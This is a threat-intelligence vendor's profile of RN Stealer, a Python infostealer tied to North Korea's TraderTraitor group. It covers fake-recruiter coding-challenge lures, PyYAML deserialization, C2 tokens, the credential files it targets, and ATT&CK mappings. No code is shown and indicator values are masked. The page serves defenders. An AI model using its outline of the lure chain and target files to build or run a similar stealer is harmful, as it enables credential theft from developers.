Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
MalwareUsed by 3 actors

RN Stealer

RN Stealer is a Python-based infostealer tracked as RN Stealer and associated with the North Korean threat group Slow Pisces, also known as Jade Sleet, TraderTraitor, and PUKCHONG. It was observed in a campaign targeting cryptocurrency developers through fake recruiting and malicious coding challenges hosted on GitHub. In the Python infection chain, trojanized repositories used unsafe PyYAML deserialization to execute an in-memory payload sequence that deployed RN Loader and then RN Stealer, with malicious content selectively delivered only to validated victims while non-targets received benign responses.

RN Stealer was recovered as a payload delivered through RN Loader. It generates a random victim ID that is used as a cookie in communications with its command-and-control server, requests an XOR key from the server for encrypting exfiltrated data, and uses Base64-encoded tokens R0, R64, R128, and R256 to manage communications and exfiltration. The recovered sample was taken from a macOS system.

Its collection focus includes sensitive developer and cloud-related data from macOS hosts, including the login.keychain-db file, stored SSH keys, installed applications, home directory contents, and configuration files for AWS, Kubernetes, and Google Cloud. Reporting also describes RN Stealer, together with RN Loader, as part of TraderTraitor’s malware arsenal used to harvest SSH keys, saved credentials, and cloud service configurations from compromised developer workstations. The activity is tied to financially motivated DPRK operations focused primarily on the cryptocurrency sector.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Lazarus

However, we recovered a Python-based infostealer delivered by option 2, and we track this malware as RN Stealer. RN Stealer first generates a random victim ID, subsequently used as a cookie in all communications to the C2 server. It then requests an XOR key from the server for encrypting exfiltrated data.

via palo alto networks unit 42 blogunit42.paloaltonetworks.com
TraderTraitor

However, we recovered a Python-based infostealer delivered by option 2, and we track this malware as RN Stealer. RN Stealer first generates a random victim ID, subsequently used as a cookie in all communications to the C2 server. It then requests an XOR key from the server for encrypting exfiltrated data.

via palo alto networks unit 42 blogunit42.paloaltonetworks.com
Contagious Interview

Listed in the Wiz “TraderTraitor: Deep Dive” entry.

via malpediamalpedia.caad.fkie.fraunhofer.de
MITRE ATT&CK

Techniques & procedures

15 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

4 techniques
T1195Supply Chain CompromiseEvidence1

“...posing as potential employers and sending malware disguised as coding challenges... require developers to run a compromised project...” ; “...ran the script without inspecting its contents... hidden malware... credentials... stolen...”

T1199Trusted RelationshipEvidence1

Slow Pisces began by impersonating recruiters on LinkedIn and engaging with potential targets, sending them a benign PDF with a job description... attackers presented them with a coding challenge... which links to a GitHub repository.

T1566.002Spearphishing LinkEvidence1

The question sheets include generic software development tasks and a “real project” coding challenge, which links to a GitHub repository.

T1566.003Spearphishing via ServiceEvidence1

Slow Pisces engaged with cryptocurrency developers on LinkedIn, posing as potential employers and sending malware disguised as coding challenges.

Execution

1 technique
T1059.006PythonEvidence1

The deserialization payload establishes a command loop with the C2 server... delivering a custom Python infostealer via option code 2... Base64-decodes sent content and executes it using the Python built-in exec.

Stealth

2 techniques
T1036MasqueradingEvidence1

The repositories contained code adapted from open-source projects... The malicious command-and-control (C2) server is configured to mimic the format of the legitimate sources... domains... frequently using subdomains like .api or .cdn.

T1620Reflective Code LoadingEvidence1

The following stages in Table 1 exist primarily in memory and generally have no footprint on disk... Delivery of payloads at each stage is heavily guarded, existing in memory only.

Credential Access

2 techniques
T1528Steal Application Access TokenEvidence1

RN Stealer... steal[s]... Configuration files for AWS, Kubernetes and Google Cloud.

T1649Steal or Forge Authentication CertificatesEvidence1

RN Stealer... steal[s] information specific to macOS devices, including... The login.keychain-db file that stores saved credentials in macOS systems.

Discovery

2 techniques
T1082System Information DiscoveryEvidence1

It sends basic information about the victim machine and operating system... RN Stealer... steal[s] information specific to macOS devices, including: Basic victim information: Username, machine name and architecture Installed applications

T1083File and Directory DiscoveryEvidence1

RN Stealer... steal[s]... A directory listing and the top-level contents of the victim’s home directory.

Command and Control

3 techniques
T1001Data ObfuscationEvidence1

Communication with the C2 server occurs over HTTPS, using Base64-encoded tokens to identify request and response types... It then requests an XOR key from the server for encrypting exfiltrated data.

T1071.001Web ProtocolsEvidence1

It sends basic information about the victim machine and operating system over HTTPS to the same C2... Communication with the C2 server occurs over HTTPS, using Base64-encoded tokens to identify request and response types.

T1105Ingress Tool TransferEvidence1

Base64-decodes sent content and saves it to the file init.dll for Windows or init for all other operating systems... Loads and executes the downloaded DLL... Content is saved to the file dockerd... dockerd is then executed in a new process.

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

RN Stealer first generates a random victim ID... It then requests an XOR key from the server for encrypting exfiltrated data... R64 – exfiltrating data, R128 – exfiltrating compressed data.

INDICATORS OF COMPROMISE

IOCs tracked for this family

4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
2 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
hash.sha256●●●●●●●●●●●●View more in app1 year ago
hash.sha256●●●●●●●●●●●●View more in app1 year ago
domain●●●●●●●●●●●●View more in app1 year ago
uri●●●●●●●●●●●●View more in app1 year ago
ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

5 SOURCESView more in app
malpediaNews
Mar 23, 2026
WageMole (Threat Actor)

A named stealer referenced in TraderTraitor-related reporting.

Read more
cybersecuritynewsNews
Jul 30, 2025
Lazarus Subgroup ‘TraderTraitor’ Attacking Cloud Platforms and Poisoning Supply Chains

RN Stealer is a Python-based information stealer used by TraderTraitor to harvest SSH keys, saved credentials, and cloud service configurations from compromised developer workstations, facilitating further compromise of cloud assets.

Read more
the hacker newsNews
Apr 21, 2025
⚡ THN Weekly Recap: iOS Zero-Days, 4Chan Breach, NTLM Exploits, WhatsApp Spyware & More

Stealer malware deployed by North Korean threat actors to exfiltrate sensitive data from infected cryptocurrency developers' systems.

Read more
ctoatncsc substackNews
Apr 20, 2025
CTO at NCSC Summary: week ending April 20th

Information-stealing malware used against cryptocurrency developers via a coding-challenge lure.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching4

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping15

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.